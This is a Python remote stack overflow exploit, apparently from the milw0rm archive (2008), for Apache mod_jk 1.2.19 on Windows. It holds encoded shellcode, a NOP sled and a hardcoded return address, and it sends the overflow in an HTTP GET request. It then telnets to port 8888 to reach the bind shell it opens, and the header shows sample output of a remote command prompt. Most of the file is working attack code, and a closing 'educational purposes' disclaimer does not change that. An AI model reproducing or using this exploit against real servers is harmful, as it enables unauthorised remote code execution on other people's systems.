#!/usr/bin/python
#
#   _____ _   _ _____  _____ _____ _____
#  /  ___| |_| |  _  \|  _  |  _  |_   _|
#  | (___|  _  | [_)_/| (_) | (_) | | |
#  \_____|_| |_|_| |_||_____|_____| |_|
#         C. H. R. O. O. T.  SECURITY  GROUP
#         - -- ----- --- -- -- ---- --- -- -
#                      http://www.chroot.org
#
#                          _   _ _ _____ ____ ____ __  _ 
#        Hacks In Taiwan  | |_| | |_   _|  __|    |  \| |
#        Conference 2008  |  _  | | | | | (__| () |     |
#                         |_| |_|_| |_| \____|____|_|\__|
#                                      http://www.hitcon.org
#
#
#  Title =======:: Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit
#
#  Author ======:: unohope [at] chroot [dot] org
#
#  IRC =========:: irc.chroot.org #chroot
#
#  ScriptName ==:: Apache Module mod_jk/1.2.19
#
#  Vendor ======:: http://tomcat.apache.org/
#
#  Download ====:: http://archive.apache.org/dist/tomcat/tomcat-connectors/jk/binaries/win32/
#
#  Tested on ===:: Apache/2.0.58 (Win32) mod_jk/1.2.19
#                  Apache/2.0.59 (Win32) mod_jk/1.2.19
#
#  Greets ======:: zha0
#
#
#  [root@wargame tmp]# ./apx-jk_mod-1.2.19
#  Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
#  usage: ./apx-jk_mod-1.2.19 <host>
#
#  [root@wargame tmp]# ./apx-jk_mod-1.2.19 192.168.1.78
#  Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
#    [+] connecting to 192.168.1.78 ...
#
#  Trying 192.168.1.78...
#  Connected to 192.168.1.78.
#  Escape character is '^]'.
#  Microsoft Windows XP [.. 5.1.2600]
#  (C) Copyright 1985-2001 Microsoft Corp.
#
#  C:\AppServ\Apache2>
#
#

import os, sys, time
from socket import *

shellcode  = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68"
shellcode += "\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32"
shellcode += "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43"
shellcode += "\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71"
shellcode += "\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c"
shellcode += "\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74"
shellcode += "\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66"
shellcode += "\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c"
shellcode += "\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b"
shellcode += "\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79"
shellcode += "\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54"
shellcode += "\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36"
shellcode += "\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30"
shellcode += "\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66"
shellcode += "\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73"
shellcode += "\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b"
shellcode += "\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63"
shellcode += "\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a"
shellcode += "\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f"
shellcode += "\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73"
shellcode += "\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c"
shellcode += "\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70"
shellcode += "\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61"
shellcode += "\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33"
shellcode += "\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32"
shellcode += "\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e"
shellcode += "\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39"
shellcode += "\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39"
shellcode += "\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e"
shellcode += "\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e"
shellcode += "\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51"
shellcode += "\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64"
shellcode += "\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37"
shellcode += "\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70"
shellcode += "\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e"
shellcode += "\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73"
shellcode += "\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61"
shellcode += "\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78"
shellcode += "\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e"
shellcode += "\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30"
shellcode += "\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b"
shellcode += "\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b"
shellcode += "\x4f\x69\x46\x4b\x4f\x6e\x30\x68";

foo_base = 8
buf_base = 4087
buf_offset = foo_base * 11
nop = "\x90"
ret = "\xcc\x2a\xd9\x77"
buf = nop*foo_base + shellcode + nop*(buf_base - foo_base - len(shellcode) - buf_offset) + ret
buf += "\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3" + nop*(buf_offset - foo_base - 3)

def usage():
  print 'usage: %s <host>\n' % sys.argv[0]
  sys.exit(-1)

def xpl():
  try:
    print len(buf)
    sockaddr = (host, 80)
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(sockaddr)
    payload = buf + 'HTTP/1.0\r\nHost: %s\r\n\r\n\0' % host
    s.send('GET /' + payload)
    s.close()
    print '  [+] connecting to %s ...\n' % host
    time.sleep(3)
    os.system("telnet %s 8888" % host)
  except:
    print '  [-] EXPLOIT FAILED!\n'

if __name__ == '__main__':
  print 'Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope [at] chroot.org)\n'
  try:
    host = sys.argv[1]
  except IndexError:
    usage()
  xpl()


# [NOTE]
#
# !! This is just for educational purposes, DO NOT use for illegal. !!
#

# milw0rm.com [2008-07-18]
